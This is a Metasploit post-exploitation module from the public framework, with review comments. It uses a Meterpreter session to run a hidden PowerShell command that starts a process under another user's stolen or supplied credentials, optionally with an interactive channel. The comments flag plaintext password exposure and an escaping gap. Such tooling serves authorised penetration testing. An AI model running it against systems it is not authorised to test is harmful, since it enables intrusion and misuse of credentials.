
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/manage/run_as_psh.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
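# Post module that starts a process under another user's credentials by
# building a PowerShell `Start-Process -Credential` command and running it
# through the Meterpreter session's process-execute call.
#
# NOTE(review): PASS is interpolated in plaintext into the powershell.exe
# command line assembled in #run. Where process-creation command-line auditing
# or PowerShell script block logging is enabled on the host, the credential
# will presumably be recorded there, so treat it as exposed once the module
# has run.
class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Powershell

  # Registers the module metadata and its user-settable options.
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows \'Run As\' Using Powershell',
        'Description' => %q{ This module will start a process as another user using powershell. },
        'License' => MSF_LICENSE,
        'Author' => ['p3nt4'],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_sys_process_execute
            ]
          }
        }
      )
    )
    register_options(
      [
        OptString.new('USER', [true, 'User to run executable as', nil]),
        OptString.new('PASS', [true, 'Password of user', nil]),
        OptString.new('DOMAIN', [false, 'Domain of user', '']),
        OptString.new('EXE', [true, 'Executable to run', 'cmd.exe']),
        OptString.new('ARGS', [false, 'Arguments', nil]),
        OptString.new('PATH', [true, 'Working Directory', 'C:\\']),
        OptBool.new('CHANNELIZE', [true, 'Chanelize output, required for reading output or interracting', true]),
        OptBool.new('INTERACTIVE', [true, 'Run interactively', true]),
        OptBool.new('HIDDEN', [true, 'Hide the window', true])
      ]
    )
  end

  # Builds the PowerShell one-liner from the datastore options, executes it on
  # the session and relays the resulting channel (interactively or as a single
  # read).
  #
  # @raise [RuntimeError] when have_powershell? is false, or when INTERACTIVE
  #   is set but the session is not currently interacting
  def run
    raise 'Powershell is required' unless have_powershell?

    # Every option value below is placed inside a PowerShell single-quoted
    # literal. Inside such a literal the only special character is the single
    # quote itself, written as two single quotes. Without this doubling, a
    # value containing an apostrophe (a password, for example) ends the
    # literal early and the generated command is malformed.
    psh_quote = ->(value) { value.to_s.gsub("'", "''") }

    # Variable setup
    user = datastore['user']
    pass = datastore['pass']
    domain = datastore['domain']
    # Each backslash in EXE and PATH is doubled before interpolation.
    exe = datastore['exe'].gsub('\\', '\\\\\\\\')
    inter = datastore['interactive']
    args = datastore['args']
    path = datastore['path'].gsub('\\', '\\\\\\\\')
    channelized = datastore['channelize']
    hidden = datastore['hidden']

    # A USER given as DOMAIN\name overrides the DOMAIN option.
    domain, user = user.split('\\') if user.include?('\\')

    # Interactive mode needs a session that is currently being interacted with.
    if inter && !session.interacting
      print_error('Interactive mode can only be used in a meterpreter console')
      print_error("Use 'run post/windows/manage/run_as_psh USER=x PASS=X EXE=X' or 'SET INTERACTIVE false'")
      raise 'Invalide console'
    end

    # Prepare powershell script
    # NOTE(review): the finished script is wrapped in double quotes for -c
    # further down; a double quote inside an option value is not escaped here
    # and would presumably terminate that wrapper early.
    scr = "$pw = convertto-securestring '#{psh_quote.call(pass)}' -asplaintext -force; "
    scr << '$pp = new-object -typename System.Management.Automation.PSCredential ' \
           "-argumentlist '#{psh_quote.call(domain)}\\#{psh_quote.call(user)}',$pw; "
    scr << "Start-process '#{psh_quote.call(exe)}' -WorkingDirectory '#{psh_quote.call(path)}' -Credential $pp"
    scr << " -argumentlist '#{psh_quote.call(args)}' " if args && args != ''
    if hidden
      print_status('Hidden mode may not work on older powershell versions, if it fails, try HIDDEN=false')
      scr << ' -WindowStyle hidden'
    end
    scr = " -c \"#{scr}\""

    # Execute script
    exec_opts = {
      'Channelized' => channelized,
      'Desktop' => false,
      'Session' => false,
      # Always true for the powershell.exe host process; the HIDDEN option
      # only controls the -WindowStyle switch appended above.
      'Hidden' => true,
      'Interactive' => inter,
      'InMemory' => false,
      'UseThreadToken' => false
    }
    p = client.sys.process.execute('powershell.exe', scr, exec_opts)
    print_status("Process #{p.pid} created.")
    print_status("Channel #{p.channel.cid} created.") if p.channel

    # Process output: hand the channel to the console when interactive,
    # otherwise do a single read and print whatever came back.
    if inter && p.channel
      client.console.interact_with_channel(p.channel)
    elsif p.channel
      data = p.channel.read
      print_line(data) if data
    end
  end
end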